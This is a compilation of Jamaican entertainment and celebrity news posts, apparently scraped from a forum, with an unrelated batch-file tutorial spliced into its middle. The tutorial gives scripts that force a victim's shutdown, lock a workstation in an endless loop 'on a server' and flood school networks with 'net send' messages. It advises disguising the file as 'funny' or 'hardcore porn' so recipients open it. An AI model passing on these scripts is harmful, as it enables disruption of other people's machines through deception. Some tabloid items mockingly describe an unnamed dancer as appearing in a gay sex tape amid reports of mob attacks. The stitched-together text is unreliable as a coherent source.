Rumours that have been flying for weeks have now become fact, confirmed by Usher himself. The singer's official TV statement confirms that he will soon add Step-daddy to his title when he marries his former stylist and mother of three, Tameka Foster. The rumours started when Foster was photographed with a new engagement ring on her finger.

The R & B Mega Star said a wedding could take place before the end of the year.

Initially his mom and manager, Jonetta Patton, was against the relationship as Foster was married to someone else. Patton fired Foster as stylist alleging lacklustre styling. Foster has since had a divorce and is ready to walk down the aisle once again.

It should be noted that according to reports, Usher's split from Chilli, of TLC fame, was because she wanted more of a commitment which he was not willing to give. Incidentally, if he had married Chilli, he would also add Step-daddy to his title as she is the mother of super-producer, Dallas Austin's child.
PART 1 A little note - this will not show you how to harm someone's computer. So today, I thought I'd familiarize myself with some commands for .bat files. In this tutorial you will learn some basic commands + how to get revenge using them. You need: A computer running Windows XP (everything else you need is included) An instant messanger, in this tutorial I'll be using MSN. Useful commands for bat files: -l - Log off -s - Pain old shutdown -r - Restart -a - Abort Shutdown -f - Shutdown all applications without warning echo msgbox" " >C:\1.vbs C:\1.vbs cls ^ Makes a popup box - insert text inbetween the quotation marks. How to piss someone off! 1) Right click your desktop and click "New" then "Text document" (screenshot here) 2) Copy and paste this (or make your own using the above commands) @echo off title Hello echo msgbox"You and your computer are going down, you will regret being an ***hole." >C:\1.vbs C:\1.vbs cls shutdown -s -t 15 -c "Goodbye." This will first give the user that opens the file a popup saying "You and your computer are going down, you will regret being an ***hole.", it will then turn off their computer. But wait! All you have now is a .txt file! This will not do a thing if you send it to someone! On the menu of the text editer click "File" then "Save as" then type the filename as funny.bat You can name the file anything you want, but it must end with .bat The best file names are "funny" or "hardcore porn" in my opinion, as people open stuff like that smile.gif . Save the bat file to your desktop. So now you've got your bat file right, all you need todo is send it on. First though, I would reccomend 'compressing' the file, so you can send it through instant messagers ... right click your bat file, then click "Send to" then click "Compressed (zipped) Folder" This will create a compressed folder on your desktop (or where ever you saved the .bat) that contains the bat file. Now ~ all you have todo is send it to your victim. PART 2 Ok, open notepad and add this code: @ECHO OFF :START rundll32 user32.dll,LockWorkStation GOTO :START Then save as whatever.bat This one locks the work station, and as soon as somebody trys to log back on, it logs them back off again in about half a second, try to get this running on a server, only way to stop it is to restart, and if the server has to restart, then that f**ks the network for a bit Big Grin --------------------------------------------------------------------------------------- And this one has to one of the most annoying batch files to run on a network, add this code to a batch file: @ECHO OFF :START net send * GOTO :START Again save as whatever.bat This program sends a message of your choice to EVERY computer on the network that is running the messenger service, NT and XP usually always have this running, so again run it at school and piss everybody off. Or you could combine to two programs so that they cannot even log back on to stop it from sending thousands of messages lol. play around, have fun. Also if you want to stop the messenger service from running so you dont receive the messages no more do this: Start > Run > services.msc Find the messenger service and stop it from running.

Detectives from the Half Way Tree C.I.B are now probing the circumstances surrounding the shooting death of two men and the injuring of two others at the offices of energy drink Pimp Juice at Balmoral Avenue, Kingston 10 last night.

Dead are East Kingston strongman, Errol Leys, 47, otherwise called 'Bobby Reds' of Kirkland Avenue and Clarendon businessman David Henry, otherwise called 'John' of Rickings Avenue both in the parish.

The complex that houses the headquarters and warehouse of the local Pimp Juice distribution network is shared with car mart. The Pimp Juice brand is owned by rapper Nelly, and has appeared in several commercials endorsing the beverage. The brand recently hit the Jamaican market and has been sponsoring quite a few entertainment and other events making an impression on the locals.

Reports from the CCN' metro officer are that about 9:15 p.m., the four men were at the car mart when a white Toyota Corolla motor car with several men aboard drove up. An occupant alighted from the vehicle and asked for the owner of the local Pimp Juice franchise known as 'Shampoo' immediately opened fire hitting the four men after he identified himself. Leys died on spot while the other three men were taken to hospital where Henry succumbed to his injuries, and the others admitted in serious condition.

A man who identified himself as a friend of Leys told One876Entertainment.com that he was not at the scene when it happened but when he arrived he saw his friends body lying on the ground. Bwoy mi nuh know, Reds was a good m

Whitney Houston's 14-year marriage to Bobby Brown will officially end later this month and she will gain custody of the couple's teenage daughter, a judge ruled.

The singer dabbed her eyes with a tissue as Orange County Superior Court Judge Franz E. Miller ruled the divorce will become final on April 24. Brown did not attend the hearing Wednesday.

Houston testified she did not need spousal or child support and that her 14-year-old daughter, Bobbi Kristina, could not depend on Brown. "He's unreliable," Houston told the judge. "If he says he's going to come, sometimes he does. Usually he doesn't."

After the hearing, Houston declined to comment to reporters.

Brown's attorney, Ram Cogan, said he will seek to overturn the judge's decision. Houston filed divorce papers in October, citing irreconcilable differences. She was granted a default judgement in December to speed up the divorce. Miller's ruling Wednesday upheld the terms of that judgement.

Houston and Brown wed in 1992, when she was at the height of her fame as a Grammy-winning superstar known for hits such as I Will Always Love You.

During their tumultuous marriage, Brown was arrested for drugs and alcohol, and Houston twice entered drug rehabilitation programs.

Hip Hop star The Game - Wanted

The Game is following in Foxy Brown's footsteps as he blows off his court date and the Judge issues an Obligatory warrant for his arrest.

Hailing from Compton, this rapper is fresh on the heels of his cross-over success "It's Okay (One Blood)," which is an obvious nod to The Game's street affiliation. The song which samples reggae artist Junior Reid's "One Blood" was designed as a street single from his sophomore album, The Doctor's Advocate. But it is his streetwise nature that has him currently making headlines.

A warrant for the arrest of the rapper legally known as Jayceon Taylor, was issued after he failed to appear at a scheduled court date last week in Manhattan, but he'll have a chance to redeem himself because the warrant will be activated if he misses his next court appearance on June 13.

Taylor was arrested on Nov. 16 for allegedly impersonating an undercover NYPD officer and ordering a cab driver to run several red lights. He pleaded not guilty. The rapper stated he was in New York promoting his album and said he had no need to impersonate a police officer. The "Wouldn't Get Far" rapper alleges that his arrest "is a ploy by the hip-hop police to humiliate me, because they harass and follow me every time I come to New York."

There is no word yet on his reason for missing his court date

It seems 'Untouchable' was indeed too untouchable for all but one of the promised acts to perform.

The show, which was held at La Roose, Port Henderson Road, on Saturday night had promised many top acts, including, Rick Ross, Sizzla, Tony Matterhorn, Ken Boothe, Bounty Killer, Cobra, Macka Diamond, Mr. Vegas, Mavado, Lukie D and others. However, the closest patrons came to songs from those artistes was over the sound system.

Some minutes after 4:30 a.m. the barely-there audience was still listening to Metromedia's mix.

However, some entertainment was provided by a few female patrons tic-tocking, splitting and bouncing, and wining, much to the pleasure of the men. One male patron couldn't resist and decided to approach the female who had taken centerstage. He ran behind her and did a wine of sorts, but she quickly turned and jumped into his slim arms. It proved to be a mistake because they fell.

"When yuh a f- dem gal deh, yuh cyaan gwaan like yuh a play ludi, yuh haffi f- dem hard like yuh a stab ice," screamed the selector.

Another patron, a plump light-skinned female took the dance floor when Aidonia's Ukku was played. She dutty wined, crawled and wined, but to the chagrin of many onlookers who were close by, the army of liverspots between her legs didn't leave them wanting more.

The selector continuously gave a shout out to "Mavado and di Cassava Piece massive in di house" and "Vybz Kartel and di Portmore Empire inna di house". However Vybz Kartel and Aidonia only strolled in at 5: 30 a.m. and if Mavado had been at the venue, he must have worn Harry Potter's invisibility cloak, because he never performed.

This female patron stole the spotlight during the early hours of the show.

Finally, it was time for the performances. First up was Lazarus, a fresh act, singing a song no one knew or paused to listen to: maybe Lazarus shouldn't have been raised from the dead afterall?

Next up was Nesbeth who gave the crowd something to cheer about with I Love Her and two other songs. Other acts including Renegal from Newland, Portmore and Likkle Cute (singing "gal fi get f inna py. A wha do some gal wha a tek f- inna by?!").

Spice who was there decided to take the stage with Nuh Fight Ova Man, Round Di Rear, and a new song poking fun at Beenie Man. Though she had the crowd screaming for more, she didn't tarry; she told THE STAR earlier that she was not being paid, "so mi just a go show mi face fi mek dem see say mi deh yah."

Also performing were: Ras Ghandi and G-Whizz. The latter, doing two songs, one of which the crowd could have done without - with him singing 'ho-ho-hot' in falsetto.

Then at 6 a.m., the announcement came that it was time for Vybz Kartel and the Portmore Empire to hit the stage.

Kartel launched into one-liners from the songs: I Never, Smoke For Life, The Best Days Of My Life, Show Yuh Hairstyle, Beyonce Wine, Hot F-, among others.

Then there was a burst of energy when Aidonia took the mic and said the line 'bagga-bagga-bagga'. It got more intense when Deva Brat followed with the line 'bull-le-let!' , then launching into the song. It was back to Aidonia, Kartel and upcoming acts from the Portmore Empire.

Then at 6:30 a.m. Aidonia jumped from the stage, followed by Kartel and his entourage.
A well known dancer who hails from the parish of Westmoreland has been identified as the lead protagonist in a gay sex tape circulating in western Jamaica. "What makes the whole thing even more shocking is that the boy has a babymother and has a yute...him run weh from the area from the tape buss," one insider told this writer. There are actually two gay sex DVDs in wide circulation in the west, one stars the aforementioned dancer and other gay dancing men who do a wide variety of creative dance moves (not sure if Hot Wuk is one of the dances) before getting it on with each other. The other features undiluted gay sex featuring what appears to be Jamaican men -- given their accents -- engaged in full-on, sometimes unprotected gay sex. One of The DVDs, which features a dancing troupe of what one man dubbed 'gay bottomists' is apparently quite the revelation and has generated impressive sales on the bootleg market while simultaneously creating quite a scandal in the towns of Montego Bay, St. James and Savanna la Mar, Westmoreland. The prevailing mood in the west given these happenings created the anti-gay sentiment which ignited a mob attack on three alleged homosexuals during the MoBay Nite Out carnival event early yesterday morning. The town of Montego Bay has long had a reputation for a loose, 'anything-goes' culture and years ago, was tainted with the title 'Gay Mobay' because of an annual gay and transvestite beauty queen contest held within the city limits. One of the men was hospitalised. This is the second such incident, following on the heels of three men dubbed the 'Valentine's Day Vees' who, on February 14, were branded as homosexuals had to be rescued by cops from an irate mob in HWT. We were unable to ascertain the identity of the dancer involved.

Anti-gay riot at soca show

An angry mob forced the premature end to the Montego Bay leg of the Supreme Ventures Jamaica Carnival blow-out, when they hurled missiles at a group of alleged homosexuals on Sunday.

Police say at least two members of the group were hospitalised, one in serious condition.

The men were among a group of costumed dancers, gyrating in a lewd and sexually suggestive manner on-stage, during judging of the costumes.

The packed Old Hospital Park erupted into a near stampede, when several patrons hurled missiles at the group, some members of which they accused of being on sex tapes that are being circulated in the city.

One man fled the stage and was chased through the town. He was held on St. James Street, where he was chopped and beaten.

"He played dead to avoid being killed by the crowd, but managed to sit up as soon as he saw the police arrive," an officer said. "We are not sure if he will live because he has suffered serious head injuries."

People scampered

Media personnel and M.C. 'Jerry D' were forced to flee the stage, as well as calypsonian Oscar B and other members of the Byron Lee and the Dragonnaires Band.

As hundreds of people scampered to avoid injury, Jerry D begged the audience to remain calm.

One of the injured men had to seek refuge inside the popular Coral Cliff Gaming Lounge, after being chased relentlessly by a mob along Gloucester Avenue. He too was beaten before he jumped over a bar counter and hid.

"Mi see a man with an illegal gun who wanted to shoot him, but we neva know so much legal guns were inside the premises, so everybody have to back off," a member of the mob told The Star.

Investigators are still probing the incident, but have confirmed that no one has been arrested in connection with the brutal attack.

The digital video discs (DVDs), which portray life in Montego Bay's gay underworld is reportedly catching wholesale attention.

Showing men clad in 'sexy' female garments such as thongs, panties, padded brassieres, stiletto heels and body hugging blouses, the dvds have been in circulation for several weeks.

The Star obtained copies and saw that one of the cross-dressers, apparently the life of the party, outfitted in a short black skirt suit and long black curly hair. He was constantly gyrated to the latest dancehall moves such as 'Dutty Wine' and 'Hot Wuk.

At one point, the sound system selector was observed hiding behind the turntable and was heard asking the cross-dressers to "turn me on".

In the other tape, men were seen having sex with each other.

Speculations abound that the police first released videos in the aftermath of the Montego Bay lottery scam bust in February, but others believe that their circulation might have been the work of the gay community, who want to display their way of life.

When contacted, Mark Shields, Deputy Commissioner of Police in charge of crime said: "I am hearing about it for the first time. We would have to review it to see what action, if any, can be taken."
Steve Khemlani pleaded not guilty to charges of abstracting electricity when he appeared in the Corporate Area Resident Magistrate's Court yesterday.

According to reports, On March 12, 2007, Charles Hendricks, a technician employed to the Jamaica Public Service (JPS) along with other technicians assigned to the Revenue Protection Department (RPD) and police officers attached to the Half-Way Tree Police Station visited Khemlani Mart, in Tropical Plaza, along Constant Spring Road.

Upon entering the premises, Mr. Hendricks identified himself and was greeted by Anthony Pereira, the manager of the store.

It was further reported that upon investigation by the technician, it was found that there was no meter or metering device attached to the wires that formed a complete circuit. The inspected wires were connected to appliances in the store, thus providing the premises with electricity.

In addition, the technician also found out that those wires were connected to JPS's secondary lines.

Mr. Hendricks subsequently made checks with his office and was advised that there was no contract to supply the premises with electricity.

360 spot lamps, two fans, one refrigerator, two air conditioning units and a computer were said to be the appliances connected to the illegal wiring. The appliances together consume $166,860 per month worth of electricity.

A mention date of May 17 was set for the matter.

Lutan Fyah angers Rastas

At least two of the major acts who were schedule to perform at the 'Reggae In the Valley' show left the venue without performing after a being disrespected by another artiste.

'The Messenger' Luciano and Anthony B left the venue after comments made by Lutan Fyah during his stint on stage.

During his performance, Luton Fire, who is a fairly young artiste in the music business, said "Big up Bounty Killer, yuh turn a lot of young youths into millionaires, and the Rastas are not doing anything for the youths."

However, shortly after he came off the stage and left the VIP area it was obvious that his statement angered other Rastafarians such as Capelton who left the VIP area along with his followers after Luciano and Anthony B.

But after much pleading and begging by promoter of the event, Fantan Mojah, for Capelton to grace the stage, the fireman agreed to the delight of the patrons.

During a break for a band change Fantan Mojah, told The STAR that he was not daunted by the slight hiccup and that he intends to turn the show into a yearly event.

Prior to turning down an offer for an interview with this reporter, 'the fireman' Capelton described the statement made by Lutan Fyah as a disrespect to Rastas in general.

"This is a rasta event and no man should come here to dis Rasta. Rastas are loving people so how a man fi come ah seh Rasta no do nothing fi nobody," the fireman was overheard saying to some of his followers.
IPB Image Reggae singer Luciano, known for his pleasing demeanour, lost his cool at Saturday night's 'Unite the People' show held at the Montpelier Show Ground, in St. James. Luciano kicked a monitor box off the stage before leaving in a huff after he was heckled by a fan. The artiste, who was billed to perform at 2:00 a.m. but was not called to the stage until 4:30 a.m., hit centre stage looking eager and ready to work. However, after kneeling down and saying his customary opening prayer, a voice from the crowd shouted, "come off the stage Rasta." With a look of shock and disbelief on his face, the man known as 'The Messenger' looked in the direction from which the sound came and proceeded to blast the person who had made the comment. "Wha yu seh - seh me fe come offa de stage but wait - unoo nuh respect righteousness," said Luciano. "So unoo nuh love righteousness. Well, I am going to sweep over unoo soul tonight." As the band began to play the song, Sweep Over My Soul, Luciano stopped singing, and still looking in the direction from which the comment had come, kicked the monitor box of the stage. "I come here from midnight to perform for the people and now you telling me to come off the stage," said the still-seething Luciano. "Yet it is unoo same one listening to the slack lyrics dem and jumping up and down. Bout unoo want to fight righteousness." Luciano briefly regained his composure and began singing the song, So Long Rastafari Call Yu, but his eyes were soon swimming in tears. He then stopped singing again, told the audience he was leaving and walked off the stage. Backstage, he had to be consoled by friends and fans as he wiped tears from his eyes. In an interview with The STAR about half and hour after he left the stage, a still crestfallen Luciano, with tears still in his eyes, said he was greatly disturbed by what he had heard, contending that as a singer of edifying music, he deserves to be treated better. "It is something that I have been noticing for some time now and it is bothering me," he said. "Our people are glorifying slack and derogatory lyrics and rejecting that which is positive and uplifting. That cannot be a good sign." While promising to remain steadfast in his mission to sing uplifting music, Luciano said he was calling on other artistes to do the same as no effort should be spared to rescue the current generation of wayward youths. "I lost my cool because I was so disappointed with what I heard," said Luciano. "However, I will continue to soldier along in righteousness because that is my mission in life."

A spirit of malcontent appears to be spreading through the entertainment fraternity like a virulent contagion which the individuals in the industry seem powerless to stop. First, it was the deejays, then the dancers, and now, believe it or not, the reggae Rastafarian community is undergoing a rift of sorts between members.

The rift was set in motion by comments made by singer Lutan Fyah.

On Friday night, during Fantan Mojahs Reggae in the Valley show, Rastafarian Lutan Fyah delivered a performance that provoked the ire of several Rastafarian singers including Capleton, Luciano and Anthony B. In fact, Luciano and Anthony B appeared to be so incensed by the comments that they chose to leave the show before performing.

Lutan Fyah bigged up Bounty Killer for bussing yutes and turning them into millionaires, and chided Rastafarian singers who did not do the same. He did not direct his comments to anyone in particular, but the euphemism seemed to strike at the heart of at least three entertainers in a most savage manner.

One876Entertainment.com spoke to Lutan Fyah about the figurative fire he ignited and the fallout from the comments.

All I said was big up Bounty Killa mek yute tun millionaire, and yu have some rasta have man ah dem yard ah wash dem dog and wash dem car and ah call them God Almighty, and a few of them take offence and waan come gang me, he explained.

Mi have to tan up on my two foot dem left and right because Anthony B, Capleton and Luciano want to gang me, say me diss rastafari, when all I did was refer to the music, so how all of sudden dem say me diss the rasta movement. Why only dem alone choose fi tek offence? Look how much rasta were at the stage show and backstage and dem say, good fire Fantan, dem love it so why dem hurt? he asked.

Lutan claimed that the real reason for their anger was the fact that Bounty Killer worked directly after Lutans performance, and they would have had to work after the dancehall icon. They had congregated at a gas station located on Stony Hill road and when they say him approach, ambushed him, verbally chastising the singer whose hit, Save the Juveniles is #5 on the Richie B Tru Juice charts.

Dem no waan work after Bounty Killer, thats why dem lef and den dem try pull it off on me, but mi stand up to dem, loud fi loud, Luciano jump up on top of his van and called me a sellout and that Bounty Killer buss pure devil, Capleton say me have a problem with him, him say me diss rastafari and ah fight gainst him, Anthony B say me tek side and mi grudge him, but yet still, man like I-Wayne no vex, he said.

How dem fi talk say Bounty Killer buss pure devil, like dem a live like real rasta roun ere? Lutan Fyah asked.

Efforts to contact the other artistes involved in the animosities in the community proved futile.

Could Alliance member Wayne Marshall face a similar fate as deejay Vybz Kartel?

One will recall some time ago, after Vybz Kartel attended the wedding of Bounty Killer's long-time rival Beenie Man and D'Angel (Killer's x-girlfriend), the two had a fall out, leading to Kartel leaving the Alliance.

Now, Wayne Marshall is billed to perform at D'Angel's birthday party to be held at Backyaad on Constant Spring Road this Sunday. Will there be similar effects if he does attend?

Birthday girl D'Angel is not the least bit concerned as says she was not about to get mixed up in all the politics.

"Marshall and I are friends, I asked him to do the show and he said yes. Mi nuh inna di politics an di fight 'gainst ting. Marshall is his own big man," D'Angel said. "Dah show yah bigga dan dem ting deh."

When contacted, however, Wayne Marshall said he was uncertain as to whether or not he would actually be able to make it.

"Angel ting now, mi worried bout dat cause mi suppose fi deh Antigua, but mi not even get fi talk to ar yet," Marshall said.

Marshall, however, said he was unable to accommodate questions regarding how this would affect his place in the Alliance as he was in the middle of a 'voicing session'.

In an article published in The Star, dated December 1, 2006, Kartel made it public that he was no longer in the Bounty Killer-led Alliance.

Kartel said, "mi a big man. Bounty Killer waan control the artiste dem, no man nuh control me."

The deejay said that Bounty had been upset since he went to Beenie and D'Angel's wedding in August of last year and that the problem intensified further when he performed at Beenie's Summer Sizzle show.

However, the breaking point came when Kartel recorded a song with D'Angel called Baby Daddy, one which many believed, disrespected Bounty Killer.

Aidonia, Mavado and Ninjaman will headline the Full Blast anniversary dance will be held at Burwood Beach, Trelawny on April 7.

A host of other performers such as Nitty Kutchie, One Third, Zumjay, Porfessor Nuts, Ward 21, Krazy Kris and Merital will be on hand to entertain patrons.

Right now, it is an annual dance that people are looking forward, it is the first time that two young hot artistes will be working at one night in Trelawny, that will build a wicked vibe for the people of the community, publicist Michael Lunan said.

Music will be provided by Full Blast, Metromedia, Insomniak and Electro Force. The gate prize will be a trip to a Caribbean destination.
There has been ongoing friction between Aidonia and Mavado ever since Vybz Kartel decided to leave the Alliance last year. Have they buried the hatchet after the much publicised Mavado-Kartel truce? Or has the friction remained?

Britney Spears and Kevin Federline reached a settlement in their divorce Thursday, a spokesman for Federline's attorney said. After a five-hour meeting with their attorneys present, Spears and Federline signed "a global settlement on all issues of their marriage," said Michael Sands, a spokesman for Federline's attorney Mark Vincent Kaplan.

Sands declined to elaborate on terms of the settlement, saying only that it covers child custody and financial matters.

Spears' attorney, Laura Wasser, declined to comment.

The settlement came more than a week after Spears checked out of a luxurious rehab center. During her nearly one-month stay at Promises Malibu Alcohol and Drug Rehab Treatment Facility, Spears and Federline were under a temporary agreement that gave them joint custody of their two young sons.

When Spears filed for divorce on Nov. 7, the pop star cited irreconcilable differences as the reason for ending her two-year marriage to Federline. She sought custody of the children, with visitation rights for Federline.

Federline counter-filed court papers the following day seeking sole custody of their boys 6-month-old Jayden James and 18-month-old Sean Preston and for spousal support.

Michelle DAngel Downer will celebrate her birthday with a stage show/party event on April 1 at Backyard, Constant Spring Road this weekend.

Its going to be an incredible event and a lot of members of the local reggae and dancehall fraternity will be present, Richie Spice, Aidonia, Munga, Kartel, Chuck Fender, Anthony B, Perfect, Alize, Zumjay, Little Hero, and of course Beenie Man, she told One876Entertainment.com.

Not surprisingly, there is no Bounty Killer billed on the event, however, one notable member of the Alliance, Wayne Marshall is on the poster.

"Wayne has been a good friend of mine for years, so he is expected to come," D'Angel said.

In the meantime, the female deejay, whose combination hit with Vybz Kartel, Baby Daddy is already in the top ten of the RE dancehall charts, also hinted that there will be special guest celebrities but that she refused to name names at this juncture. Last years party for DAngel was a 'rehearsal of sorts' for the last years wedding fiesta of the two lovebirds. At that shindig, the couple arrived together in a limousine, and a throng of photographers and videographers descended on them. Beenie was dressed in an impeccable white suit, with an aqua blue shirt underneath, while D'Angel was dazzling in an expensive satin gold, custom-made, diamond encrusted into the lace.

What will happen this year?

Come and youll find out, she said, laughing.IPB Image
DANIA BEACH, Fla. - Former Playboy Playmate Anna Nicole Smith died of an accidental overdose of a sleeping medication and other drugs after she was found unresponsive at a hotel, authorities said Monday.

Broward County Medical Examiner Joshua Perper said Smith died of "combined drug intoxication" with the sleeping medication chloral hydrate as the major factor. Smith was taking a lengthy list of other medications, including methadone for pain, he said.

Chloral hydrate is a sedative used to treat insomnia and alcohol withdrawal, relieve anxiety and ease post-surgery pain. Perper said Smith had been on several antidepressant and antianxiety drugs prior to her death.

"We found nothing to indicate any foul play," said Chief Charlie Tiger of the Seminole police department.

Perper said the detailed autopsy also showed no evidence of disease.

Smith, 39, was found unresponsive Feb. 8 in her room at the Seminole Hard Rock Hotel and Casino in Hollywood.

The weeks after her death were filled with public courtroom drama and private whispers about what might have killed her. Officials delayed releasing the autopsy results because of additional evidence, not publicly released.

Perper's initial examination had revealed no serious injuries to her body. Perper said then that prescription drugs, but no illegal drugs, were found in Smith's hotel room, though he wouldn't identify them.

Smith had arrived at the Hard Rock on Feb. 5 and planned to leave four days later aboard a new yacht that her companion Howard K. Stern was arranging to buy. She was seldom seen outside her room during her stay: She was said to be suffering from a stomach flu before she died.

Because her death was so sudden, and because her 20-year-old son Daniel died under suspicious circumstances five months earlier, there has been speculation about possible criminal activity surrounding the deaths. The Seminole Police Department investigated the case because the casino is on tribal land.

An inquest into Daniel's death is scheduled to start Tuesday in the Bahamas, where he died.

Smith grew up in Texas and went from topless dancer to Playboy Playmate of the Year, Guess jeans model and bride of 89-year-old oilman J. Howard Marshall II. She took her fight for Marshall's estimated $500 million fortune as far as the Supreme Court, and the ongoing battle could make her infant daughter, Dannielynn, very wealthy. Stern and two other men have claimed to be the baby's father.

Maybe its true after all. Check this equation: Lyrical Warfare plus well-written diss lyrics equals CAH CHING! Just ask dancehall heavyweights Mavado and Vybz Kartel who will be appearing as the headline acts in no less than three dances over the next two weeks.

Dancehall icons Beenie Man and Bounty Killer proved it with their infamous public spats over the years, and we have a few lyrical gems such as the 90s classic gems Riding West (BK), Stop Live Inna the Past (BM), and Suspense and more recently, Bullet-a, Heart Attack and Bulletproof Vest to prove that they define themselves by oneupmanship of each other. In fact, you could argue that BK is great merely because he had a great foil, Beenie Man to contend with. Jimmy Connors had Ivan Lendl, Muhammed Ali had Joe Frazier, and Bounty Killer had Beenie Man.

How the Mavado- Kartel friction will play out in the future, no one knows but it was fun while it lasted. Here are a few of the clash lyrics penned before the tepid peace was brokered by DCP Mark Shields and RE talking head Kimani Robinson.

Beenie Man, the self proclaimed 'King of the Dancehall', spent all of 2006 taunting the competition. He took up, dusted off, greased and re-applied his oldest method of seeking attention- 'Warring with Bounty Killa', and, provoked everybody who was somebody in the Dancehall arena in 2006; including the Marley family.

He continued his tirades, taking them to the stage at Jamworld, 'Sting'. His track record throughout his career tells that his fortunes in lyrical karate at Sting has been limited, yet, he took to the stage 'dissing' a well-armed 'Warlord' who he had given an emotional battering all year long. The 'Warlord' ascended the stage, Beenie Man fled, and it has been misery for him since.

Along with losing 'street ratings'- that thing that matters so much in the Dancehall world, he seems to be losing it all! Shocking Vibes, Don Mafia, bookings on shows, and could soon be losing loads of money to his main songwriter, who suddenly remembers that he has not been collecting royalties for over 30 songs he wrote for Beenie Man.
clickhere.jpg

Hold on, back to the 'street-ratings' just a bit!! It is becoming sharply evident that things are all back to square-one. What am I talking about? Well, if you have been paying close attention to the Dancehall since the start of 2007, it is obvious that Bounty has Beenie on the run; that pattern to which we are more accustomed. The weapon of 'scandals' which Beenie Man applied against Bounty, taunting him about 'breeding his girl and the fact that he lives with Miss. Ivy, have back-fired against him.

In an interview with YardFlex.com, a popular entertainer who requested anonymity could not have said it better. Quote: "For the first time in 15 years Beenie had Bounty weak, and things still turn roun pon im." The artiste said his interpretation of the situation, is that Beenie Man is a trouble-maker and as such, is simply getting his judgment.

Yardflex.com contacted a number of entertainment journalists, and asked where is Beenie Man? One very prominent professional said, "He seems to be more concerned with paying his huge bills at this time. The last show I saw him on was Spectrum in January, and I heard that he 'ate' his words and went to Spring Break."

It is being rumored that Beenie Man has gone bankrupt, however, he refutes these allegations, along with talk of him 'making enemies' for himself. During an 'On Stage' interview on CVM, Beenie Man told his fans that he was innocent of mischief and is financially 'ok'.

But after all that was said and done, Beenie Man the self proclaimed King seems to survive every conflict and rumor that surrounds his name. How he did it? Don't ask me.

The saga continues!
Jamaican duo Brick & Lace to join Gwen Stefani & Akon on tour
SISTER DUO BRICK & LACE SET TO RELEASE DEBUT ALBUM "LOVE IS WICKED" ON AKON'S KON LIVE MUSIC LABEL JUNE 26TH

IPB Image

Having conquered US charts --"Locked Up," "Soul Survivor," "I Want to Love You" - wielding his melodic, mercurial voice, Akon is flexing his critical ear with Kon Live, a personal label distributed by Geffen Records. As impresario, Senegal's shining son was quick to solicit other imported flavor, signing Jamaican sister duo Brick & Lace as his debut act. The alliance makes perfect sense: sisters Nyanda and Nailah Thorbourne had already come to regard Akon, in demand as much for his production as his vocal stylings, as their "third member." He's all over their album Love is Wicked, lacing lead single "Never Never" with a grimy giddy-up. Set to serve as the summer's sultry soundtrack Love Is Wicked will be released on Kon Live/180 Ent./Geffen Records June 26th.

The video for "Never Never" premieres on Yahoo TODAY while the song will be featured on iTunes March 27th as "SINGLE OF THE WEEK." Log onto iTunes on Tuesday and you can download the track for free for one week!

You can also see Brick & Lace live as they head out on the road with Gwen Stefani and Akon this spring. The tour kicks off April 21st in Las Vegas at The Pearl Concert Theater and wraps up June 23rd in Irvine, California at the Verizon Wireless Amphitheatre.

Brick & Lace's dynamic as artists and their earnest appeal stems from their songwriting savvy. Nyanda and Nailah wrote or co-wrote every song on Love Is Wicked. In fact, the sisters Thorbourne have penned hits for Janet Jackson, Paris Hilton and recently wrote songs for Nicole Scherzinger of the p*u**ycat Dolls for her upcoming solo project. In addition to Akon, Brick & Lace teamed up with an arsenal of producers to give Love Is Wicked its versatile sound, most notably will.i.am, Tony "CD" Kelly , Cool & Dre, FULL FORCE, Ron Fair and Lenky.

Betrayal in the Dancehall, has this become a tradition? Well, the voice of Dancehall history is certainly saying that this is an established trend. But with this new trend it's becoming more difficult for producers or a well known artiste to lend a helping hand to upcoming artistes

Dating back to the genesis of the genre's high profile, we can recall vividly, Supercat vs. Ninja Man. Supercat is the icon credited with the distinction of giving the Dancehall the 'ever-relevant' gift, the gold teeth, front teeth, gun pon teeth Don-Gorgon. Nevertheless, relations broke down between the then leading DJ's, and reached a bitter end at that infamous 'Sting' of 1991. What took place? Artistes clashed, Supercat got bottled by the audience, and Ninja Man was the new king.

There has been much debate about what was the real cause of the 'split'. Often times I hear talk about some 'coke' thing, but let's leave that. However, the adage 'Kids live what they learn', seem to be a cornerstone in the Dancehall. In more recent times there has been Bounty Killa vs. Vybz Kartel. Without expounding this scenario one could use a quote from Kartel, which sheds a bright light on the topic. During an interview on Entertainment Report, aired on Television Jamaica (TVJ), he responded to a question from host Anthony Miller about his relations with the 'Killa', stating, "A son will not live in his father's house forever. A time will come when the son will move into his own apartment."
Although Vybz Kartel's notion is factual, there are still many who continue to deem his actions a "Judas-like'. Is the Dancehall demanding that once an artiste is a student he should not graduate? This seems to be a harsh reality in the Dancehall arena!

No matter what reason is giving by artistes for wanting to embark on their own mission, it seems the label 'betrayer' always accompany them. If we are to make a list, we would have, Supercat vs. Ninja Man Ninja Man vs. Shabba Ranks, Bounty Killa vs. Merciless, Baby Cham and Vybz Kartel; Beenie Man vs. Don Mafia, and Idonia vs Skatta. .

All that examined, it appears there could be a dramatic change of this 'Dancehall idea'! At Sting 2006 Ninja Man gave Bounty Killa something to think about. While on stage Ninja said, "People! unuh si how Kartel tun roun waa beat Bounty Killa? Well Bounty! If yuh did honour your father that thy days may be long upon the land of the lord thy God yuh wouldn't a get beaten!"
Well, the 'Warlord' seemingly took the rebuke in a good spirit and word now on the street is that he has 'made - up' with his father. Kartel and Bounty reportedly made peace at Dela Splash late last December; and Beenie Man, while ascending the stage at Dancehall Jam Jam last year was heard saying, "Ninja yuh diss mi, but mi naah ansa yuh cause mi respect mi elders."

If this recent trend continues to develop, it could be a very good 'compromise' in a tough arena.

Pakistan coach strangled

A high-ranking police officer confirmed yesterday that fresh evidence has surfaced, suggesting that Pakistan's cricket coach Bob Woolmer was strangled in his room at the Jamaica Pegasus hotel, New Kingston, between Saturday night and Sunday morning.

According to the police officer, the 58-year-old Woolmer was found half naked in his room, partially wrapped in a towel.

"A bone in the neck, near the glands, was broken and this suggested that somebody might have put some pressure on it," he said.

"We are now treating this as a homicide."

Despite this, Assistant Commissioner of Police Owen Ellington, the head of World Cup security, said he was not confirming any rumours of strangulation.

Second opinion

On Tuesday, an autopsy conducted on Woolmer's body by Government pathologist, Dr. Ere Sheshiah, proved inconclusive as to the cause of death.

Deputy Commissioner of Police Mark Shields said then that the police were awaiting the result of the toxicology and histology analysis from Woolmer's tissue sample.

Late yesterday, however, a release from the Jamaica Constabulary Force director of communications, Karl Angell, said a second opinion was being sought.

"Following consultations today involving representatives from the Government of Jamaica and the police, a decision was taken to seek the opinion of a second pathologist," the release said.

The release added that arrangements are currently being made to engage the services of the pathologist.

